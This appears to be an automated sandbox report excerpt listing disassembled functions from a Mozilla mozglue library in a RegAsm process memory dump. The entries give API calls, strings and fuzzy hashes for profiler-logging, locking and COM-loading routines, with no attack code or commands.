                                                                                                                                                                                                                                                    • Opcode ID: 126ce094f6a1ad1693054b9d3633170f1bf38e946b7d838d29b5c4d4f4a1275e
                                                                                                                                                                                                                                                    • Instruction ID: d27f0751acb8ca2f18f0321bbe22ddbd6d0a1f02751b7252faf12e506f492999
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 126ce094f6a1ad1693054b9d3633170f1bf38e946b7d838d29b5c4d4f4a1275e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E521D5B07442086FEB106B64CC49FBBB37CEF86714F808529F6459B1C1CA789D548BA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71DE73
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C74FEF3,?,?,?,?,?,?,00000000), ref: 6C71DE7B
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                    • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000), ref: 6C71DEB8
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C71DEFE
                                                                                                                                                                                                                                                    • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C71DF38
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] locked_profiler_stop, xrefs: 6C71DE83
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CurrentProcessThread$BufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] locked_profiler_stop
                                                                                                                                                                                                                                                    • API String ID: 3136165603-3405337583
                                                                                                                                                                                                                                                    • Opcode ID: 867c85690f9b1e9802c16dced07639ca6f9b4e28469491ab25519f4ba100f8d7
                                                                                                                                                                                                                                                    • Instruction ID: 6ee60c28c245acea7c3e8a327197af63f27632b03df4460ee84999982d1b2516
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 867c85690f9b1e9802c16dced07639ca6f9b4e28469491ab25519f4ba100f8d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39216D317051004BDB149B25C90C79A7B79EB5230CF9C0036D929C7F41CF34A80ACBD5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D1EC
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D1F5
                                                                                                                                                                                                                                                      • Part of subcall function 6C72AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C72AE20
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D211
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D217
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D226
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D279
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C72D2B2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3049780610-0
                                                                                                                                                                                                                                                    • Opcode ID: e8c7b5141db71f98699ea407fd2d8a245132e6785d6729dd811b4c84cd8cd851
                                                                                                                                                                                                                                                    • Instruction ID: 52213126b557dd84d562dacfe743895c6e8dda0c06a2170c338bda0be114ed47
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8c7b5141db71f98699ea407fd2d8a245132e6785d6729dd811b4c84cd8cd851
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58217C71704305DBCB05DF64C488AAEB7B5FF8A324F50462EE51A87340DB34A90ACB9A
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F619
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C71F598), ref: 6C71F621
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F637
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8,?,?,00000000,?,6C71F598), ref: 6C71F645
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8,?,?,00000000,?,6C71F598), ref: 6C71F663
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C71F62A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                    • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                    • Opcode ID: 06b93a91db8b751b815252b5bac399c89bb0a94a3005eebf407987f02fe898a0
                                                                                                                                                                                                                                                    • Instruction ID: c8f183edcc7a47b68df59a3111b7d53297c2ca94587914078cf713c9f18b0913
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06b93a91db8b751b815252b5bac399c89bb0a94a3005eebf407987f02fe898a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74119475305204ABCB44AF69D64C9A6777DFB8636CB940026EA1583F41CF71A821CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,6C6E1C5F), ref: 6C6E20AE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C6E20CD
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E20E1
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E2124
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                    • String ID: CoInitializeSecurity$combase.dll
                                                                                                                                                                                                                                                    • API String ID: 4190559335-2476802802
                                                                                                                                                                                                                                                    • Opcode ID: de664ae4308eeedf24fb4115c48c4945abb26fc1e3c23be609d2892df6a5bd23
                                                                                                                                                                                                                                                    • Instruction ID: e014f279f8dab88b3e49cca01632d93aa6904e434b5ed03538bf0e4c0cf83e90
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de664ae4308eeedf24fb4115c48c4945abb26fc1e3c23be609d2892df6a5bd23
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A021A97620520AEFDF009F54DD4CDDA3BBAFB0A324F604029FA0492690CB319861CFA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C7376F2
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000001), ref: 6C737705
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C737717
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C73778F,00000000,00000000,00000000,00000000), ref: 6C737731
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C737760
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID: }>ql
                                                                                                                                                                                                                                                    • API String ID: 2538299546-3838052867
                                                                                                                                                                                                                                                    • Opcode ID: 0cb7cb954f1592e4723fc96eab3599f5f22a5551b5c6ef452a70d3d0ba2e6ee1
                                                                                                                                                                                                                                                    • Instruction ID: 3b762b17849eb2e0503c22f2797ba91535988074e7eea9974862cebebdab69e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cb7cb954f1592e4723fc96eab3599f5f22a5551b5c6ef452a70d3d0ba2e6ee1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5911B2B1D05325ABE710AF7A8D48BABBEE8EF46354F044429F848A7301E771984487E2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C6E1FDE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C6E1FFD
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E2011
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E2059
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                    • String ID: CoCreateInstance$combase.dll
                                                                                                                                                                                                                                                    • API String ID: 4190559335-2197658831
                                                                                                                                                                                                                                                    • Opcode ID: 6f357fcc45dcfcec65ab88040611146904826877a6bc38c0cf7d0fe98c83fa2e
                                                                                                                                                                                                                                                    • Instruction ID: 865369c4b4a30c1f8a397514fd5a6a09b36039f4d548dcfe96f5dbba9ac8966f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f357fcc45dcfcec65ab88040611146904826877a6bc38c0cf7d0fe98c83fa2e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7115EB5B05205AFDF20EF15CD4CE9A3B7AFB4A369F60403AF90592680DB31A850CF61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C70D9F0,00000000), ref: 6C6E0F1D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C6E0F3C
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E0F50
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C70D9F0,00000000), ref: 6C6E0F86
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                    • String ID: CoInitializeEx$combase.dll
                                                                                                                                                                                                                                                    • API String ID: 4190559335-2063391169
                                                                                                                                                                                                                                                    • Opcode ID: b25b48fc2afd8774f6dae22e2021a0778ff628c35baf7823d23bf6bb3a3b08bc
                                                                                                                                                                                                                                                    • Instruction ID: aee28b41ecf898ce6866932942a391857f8ba49ea069050718b044dfbe38fbc8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b25b48fc2afd8774f6dae22e2021a0778ff628c35baf7823d23bf6bb3a3b08bc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2711707570A2409BDF00CF55CE08A5637B8FB4B325F84423AED05D2684DF31A415CA59
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F559
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F561
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F577
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F585
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F5A3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C71F56A
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C71F239
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C71F499
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C71F3A8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                                    • API String ID: 2848912005-2840072211
                                                                                                                                                                                                                                                    • Opcode ID: 447872b98ef011d63be5e69d420b256fd5a4027744a6c4ba06df564fc112574e
                                                                                                                                                                                                                                                    • Instruction ID: d606bfe8a0fcfde952d73fb0d49e0442bcd82adec1760edf19363bb5c5db43fb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 447872b98ef011d63be5e69d420b256fd5a4027744a6c4ba06df564fc112574e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0B4757002009BDB006F65984C97A77BDEB8629DF880035EA15C3B01CF31A8018760
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,6C6E0DF8), ref: 6C6E0E82
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C6E0EA1
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E0EB5
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E0EC5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                                                                                                    • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 391052410-1680159014
                                                                                                                                                                                                                                                    • Opcode ID: 786e2430f1ebc3f836e2627aa54e2a514c0abb4a45a194a419d0546d1d514e61
                                                                                                                                                                                                                                                    • Instruction ID: 9a88f6f03a6a035c7c74e30ed14feffa3a651a4195ae310892c7670e3a723bf2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 786e2430f1ebc3f836e2627aa54e2a514c0abb4a45a194a419d0546d1d514e61
